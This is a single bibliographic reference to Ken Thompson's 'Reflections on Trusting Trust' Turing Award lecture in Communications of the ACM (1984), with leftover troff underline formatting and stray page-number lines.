Ken Thompson, ``Reflections on Trusting Trust,'' 1983 ACM Turing
Award Lecture, in the _ C_ o_ m_ m_ u_ n_ i_ c_ a_ t_ i_ o_ n_ s _ o_ f _ t_ h_ e _ A_ C_ M, Vol. 27, No. 8,
p. 761, August 1984.


 9

 9